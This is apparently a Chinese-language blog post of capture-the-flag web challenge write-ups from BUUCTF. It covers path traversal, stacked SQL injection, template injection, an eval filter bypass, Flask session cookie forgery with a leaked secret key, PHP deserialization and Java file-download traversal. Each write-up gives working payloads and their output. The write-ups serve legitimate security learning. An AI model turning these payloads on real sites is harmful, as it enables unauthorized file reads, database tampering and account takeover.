最近的做的一些CTF

BUUCTF Web

[HCTF 2018]WarmUp

<?php
   highlight_file(__FILE__);
   class emmm
  {
       public static function checkFile(&$page)
      {
           $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
           if (! isset($page) || !is_string($page)) {
               echo "you can't see it";
               return false;
          }

           if (in_array($page, $whitelist)) {
               return true;
          }

           $_page = mb_substr(
               $page,
               0,
               mb_strpos($page . '?', '?')
          );
           if (in_array($_page, $whitelist)) {
               return true;
          }

           $_page = urldecode($page);
           $_page = mb_substr(
               $_page,
               0,
               mb_strpos($_page . '?', '?')
          );
           if (in_array($_page, $whitelist)) {
               return true;
          }
           echo "you can't see it";
           return false;
      }
  }

   if (! empty($_REQUEST['file'])
       && is_string($_REQUEST['file'])
       && emmm::checkFile($_REQUEST['file'])
  ) {
       include $_REQUEST['file'];
       exit;
  } else {
       echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
  }  
?>

据说是签到题,两次mb_substr和mb_strpos是混淆视听,没有什么作用。

取参数?前的内容,然后in_array比较白名单,那么index.php?file=hint.php?../../../../../../../../../etc/passwd即可绕过

根据hint.php提示,flag在ffffllllaaaagggg

flag not here, and flag in ffffllllaaaagggg

?file=hint.php?../../../../../../../../../ffffllllaaaagggg

flag{1d0c6f0f-8c9d-446e-9b59-b226257d8bb1}

[强网杯 2019]随便注

堆叠注入题,过滤了

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

方法1:堆叠注入,改表名读flag

# 添加字段
alter table `1919810931114514` add id int;
# 修改字段名
alter table `1919810931114514` change flag data varchar(100);
# 改名
alter table words rename to words1;

方法2:堆叠注入,handler查询语句

handler words open; handler words read first;

方法3:堆叠注入,预处理语句

PREPARE name from '[my sql sequece]';   //预定义SQL语句
EXECUTE name; //执行预定义SQL语句
(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL       语句
# POC
1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#

flag{75dd97f2-f0a6-4ce8-aa89-90157752c02d}

[SUCTF 2019]EasySQL

很奇怪的一题,不知道怎么做,POC

query=0;set+sql_mode=pipes_as_concat;select 1
或者
query=0,*

flag{051ee43e-04ae-4a2a-b7aa-c60e014550e0}

[护网杯 2018]easy_tornado

image-20200514165929416
/hints.txt
md5(cookie_secret+md5(filename))

/flag.txt
flag in /fllllllllllllag

/file?filename=/flag.txt&filehash=111621266717da9574c5aed0b60b2ac9

filehash和filename对不上的时候报错,跳转到/error?msg=Error,这存在模板注入

image-20200514170125074

{{handler.settings}}取得cookie_secret:f638a007-0430-4d12-8de8-baa9817fe985

/fllllllllllllag MD5 -> 3bf9f6cf685a6dd8defadabfb41a03a1

合并得到filehash ecdbd8449f357be158beffda11ef7d64

flag{8ae21794-99f0-4f7e-8ebc-210be3f9d8d7}

[RoarCTF 2019]Easy Calc

奇葩题目,/calc.php?[空格]num=2-1 这样的参数都能正常通过…

功能点是一个计算器,/calc.php?num=2-1,把num改成任意参数出源码

<?php
error_reporting(0);
if(!isset($_GET['num'])){
   show_source(__FILE__);
}else{
       $str = $_GET['num'];
       $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
       foreach ($blacklist as $blackitem) {
               if (preg_match('/' . $blackitem . '/m', $str)) {
                       die("what are you want to do?");
              }
      }
       eval('echo '.$str.';');
}
?>

过滤了/,用chr转换一下,var_dump(scandir(chr(47)))

array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" } 
>>> [f"chr({ord(i)})" for i in '/f1agg']
['chr(47)', 'chr(102)', 'chr(49)', 'chr(97)', 'chr(103)', 'chr(103)']

/calc.php? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

string(43) “flag{139d273f-7359-4920-8d96-8ad9a0324804} “

[HCTF 2018]admin

拿到题先别着急测,先观察一下存在的功能,这题一开始拿到后看了半天注册和登录,也没想过登录进去看看有没有别的功能。所以记住不要着急,先收集信息。

题目进来是/login和/register,注册成功后登录进去,查看源码提示

<!-- you are not admin -->

/change修改密码功能下,查看HTML发现一个Github的Flask项目

app/templates/index.html

{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>

session在已知SECRET_KEY的情况下可以另外生成

/app/config.py

class Config(object):
   SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'

利用noraj/flask-session-cookie-manager工具修改session[‘name’]后encode得到cookie

PS D:\Pentest Tools\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py encode -t "{'_fresh': True, '_id': b'86561cb0f53290e301e0234d05d57ca8a09c26ac99715d148f2698defa473986cab75ede480e0c504f0f2f28874345d20453a16b9bdd9bf1dec052fa5d4209f8', 'csrf_token': b'ad637e8ae3908694a900de7abb65f1e0de9f0564', 'image': b'QLMC', 'name': 'admin', 'user_id': '10'}" -s "ckj123"

.eJw9kEGLwjAQhf_KMmcPbbUXwUNLanFhplSiJblItbUxaVyoijbif9-sCx6HN_Pe--YJu-PQXhTMr8OtncDu1MD8CV97mEPBREh6qYVOLXEcC5726JKH5MmIbm2QbQ3xRguuFLJeo5ZKOBOTy0LJsqDIxUjazGS-tYKXU3RmRpaU0IdQVuueWHeXPNXEk0D6DLRiLFg3JYYBVeWIrAwxyh5kV7Gwa1NU3xb9nXBJiFYqvxOgTmKpuwW8JnC4DMfd9ce05w-CqMoIXdMX-dJXN3ePFFOexchSI3mjhF1FVAmP9Df3FtkmomTxtjvZums_TpvNg8r7v3KurRegbuzpDBO4Xdrh_TcIA3j9As5tbVs.Xr4woQ.Yq5bAHKDGoBo_RgBhCL6GPlZJr0

修改cookie重新访问/index得到flag.

flag{70aff5fe-c8db-4399-974e-16b2b95c0a62}

[网鼎杯 2020 青龙组]AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

   protected $op;
   protected $filename;
   protected $content;

   function __construct() {
       $op = "1";
       $filename = "/tmp/tmpfile";
       $content = "Hello World!";
       $this->process();
  }

   public function process() {
       if($this->op == "1") {
           $this->write();
      } else if($this->op == "2") {
           $res = $this->read();
           $this->output($res);
      } else {
           $this->output("Bad Hacker!");
      }
  }

   private function write() {
       if(isset($this->filename) && isset($this->content)) {
           if(strlen((string)$this->content) > 100) {
               $this->output("Too long!");
               die();
          }
           $res = file_put_contents($this->filename, $this->content);
           if($res) $this->output("Successful!");
           else $this->output("Failed!");
      } else {
           $this->output("Failed!");
      }
  }

   private function read() {
       $res = "";
       if(isset($this->filename)) {
           $res = file_get_contents($this->filename);
      }
       return $res;
  }

   private function output($s) {
       echo "[Result]: <br>";
       echo $s;
  }

   function __destruct() {
       if($this->op === "2")
           $this->op = "1";
       $this->content = "";
       $this->process();
  }

}

function is_valid($s) {
   for($i = 0; $i < strlen($s); $i++)
       if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
           return false;
   return true;
}

if(isset($_GET{'str'})) {

   $str = (string)$_GET['str'];
   if(is_valid($str)) {
       $obj = unserialize($str);
  }

}

反序列化利用,第一次做反序列化

# /etc/passwd可以正常读取
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:11:"/etc/passwd";s:7:"content";N;}

# 读任意地址失败后报错出路径
failed to open stream: operation failed in /var/www/html/index.php

可能一些特殊字符串没法回传,所以需要用base64编码后才能带出

php://filter/convert.base64-encode/resource=/var/www/html/flag.php

PD9waHAgJGZsYWc9J2ZsYWd7NTljNjMwY2ItYmNhZi00NWZjLWJiNDItZGYyNTMyMmRhNWNifSc7Cg==

<?php $flag='flag{59c630cb-bcaf-45fc-bb42-df25322da5cb}';

flag{59c630cb-bcaf-45fc-bb42-df25322da5cb}

[网鼎杯 2020 青龙组]filejava

入口一处上传文件,上传成功后出现下载文件,下载文件存在任意文件上传

/UploadServlet

/DownloadServlet?filename=e8be1e43-fd8a-4999-9786-084005051cca_1.jpg

/DownloadServlet?filename=../../../web.xml

得到servlet-class路径

 <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>
image-20200517212400423

根据路径可知源码文件存在/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class

/DownloadServlet?filename=../../../classes/cn/abc/servlet/DownloadServlet.class
  • ListFileServlet.class
  • DownloadServlet.class
  • UploadServlet.class

通过源码UploadServlet.class中部分,得知引用了可能存在问题的组件

import org.apache.poi.ss.usermodel.WorkbookFactory;

...

if (filename.startsWith("excel-") && "xlsx".equals(fileExtName))
   try {
       Workbook wb1 = WorkbookFactory.create(in);
       Sheet sheet = wb1.getSheetAt(0);
       System.out.println(sheet.getFirstRowNum());
  } catch (InvalidFormatException e) {
       System.err.println("poi-ooxml-3.10 has something wrong");
       e.printStackTrace();
}

已知存在XXE漏洞,参考:Apache-Poi-XXE-Analysis

XXE回连了半天发现是BUU的环境不允许外链… GG

发表评论

电子邮件地址不会被公开。 必填项已用*标注